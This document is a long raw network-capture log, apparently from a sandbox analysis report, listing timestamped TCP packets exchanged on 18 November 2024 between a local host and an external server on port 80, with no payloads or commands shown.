                                                                                                                                                                                            Nov 18, 2024 21:01:18.739609003 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.739646912 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.739662886 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.739686012 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.739738941 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.743267059 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.743302107 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.752504110 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.752541065 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.752582073 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.752600908 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.752830982 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.752866030 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.752895117 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.752901077 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.752937078 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.752955914 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.752974987 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.753031969 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.753516912 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.757663965 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.757700920 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.757742882 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.757807016 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.757843971 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.757869005 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.757879972 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.757930040 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.758141994 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.758178949 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.758213997 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.758229017 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.758585930 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.758620977 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.758651018 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.758656979 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.758692026 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.758708000 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.758728027 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.758763075 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.758776903 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.759445906 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.759481907 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.759505987 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.759516954 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.759552002 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.759568930 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.759588003 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.759622097 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.759643078 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.759658098 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.759707928 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.760267973 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.760304928 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.760340929 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.760361910 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.760380030 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.760415077 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.760430098 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.760449886 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.760485888 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.760502100 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.761128902 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.761167049 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.761200905 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.761212111 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.761236906 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.761248112 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.761280060 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.761332035 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.762381077 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.762439013 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.762475014 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.762505054 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.762725115 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.762759924 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.762778044 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.762794971 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.762829065 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.762845039 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.763257980 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.763292074 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.763309956 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.763345003 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.763380051 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.763397932 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.763415098 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.763452053 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.763462067 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.764070988 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.764107943 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.764133930 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.764142990 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.764180899 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.764199018 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.764578104 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.764612913 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.764633894 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.764648914 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.764683962 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.764705896 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.764718056 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.764767885 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.788965940 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.789000988 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.789036989 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.789071083 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.789139986 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.789174080 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.789195061 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.789211035 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.789246082 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.789268970 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.789675951 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.789730072 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.791018963 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.791054010 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.791089058 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.791110992 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.791596889 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.791661024 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.792541027 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.792638063 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.792673111 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.792701006 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.792707920 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.792767048 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.793076038 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.796591043 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.796643972 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.796677113 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.796698093 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.796780109 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.796943903 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.796977997 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.797012091 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.797035933 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.797729015 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.797789097 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.797815084 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.797848940 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.797910929 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.801115036 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.801151991 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.801184893 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.801219940 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.801229000 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.801259041 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.801291943 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.801299095 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.801346064 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.802222967 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.802392006 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.802427053 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.802452087 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.802536964 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.802598953 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.802685976 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.802895069 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.802953005 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.803056955 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.803092957 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.803127050 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.803150892 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.803159952 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.803227901 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.803401947 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.803435087 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.803469896 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.803498030 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.803505898 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.803541899 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.803563118 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.803577900 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.803611994 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.803636074 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.803644896 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.803719997 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.803966045 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.804002047 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.804037094 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.804063082 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.804070950 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.804106951 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.804132938 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.804898024 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.804932117 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.804961920 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.804966927 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.805001020 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.805022955 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.805036068 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.805072069 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.805094004 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.805584908 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.805619001 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.805644989 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.805653095 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.805687904 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.805713892 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.805722952 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.805757999 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.805774927 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.805793047 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.805826902 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.805846930 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.806046009 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.806085110 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.806107044 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.806119919 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.806154966 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.806171894 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.806190968 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.806226015 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.806246042 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.806260109 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.806319952 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.806884050 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.806921005 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.806955099 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.806989908 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.807001114 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.807024002 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.807043076 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.807059050 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.807111979 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.808748007 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.808804035 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.808840036 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.808860064 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.809108973 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.809142113 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.809169054 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.809175968 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.809211969 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.809247971 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.809479952 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.809509039 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.809539080 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.809542894 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.809577942 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.809604883 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.809827089 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.809861898 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.809883118 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.809897900 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.809952021 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.810235023 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.810267925 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.810305119 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.810343981 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.810380936 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.810436010 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.810471058 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.810487986 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.810523033 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.810755968 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.810811043 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.810844898 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.810867071 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.810878992 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.810944080 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.810971975 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.811007023 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.811042070 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.811062098 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.813252926 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.813287020 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.813321114 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.813333035 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.813379049 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.813389063 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.813446045 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.813479900 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.813503981 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.813532114 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.813565969 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.813591957 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.813600063 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.813636065 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.813654900 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.813669920 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.813704014 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.813724041 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.813747883 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.813782930 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.813821077 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.813832045 CET4994080192.168.2.16193.188.22.73
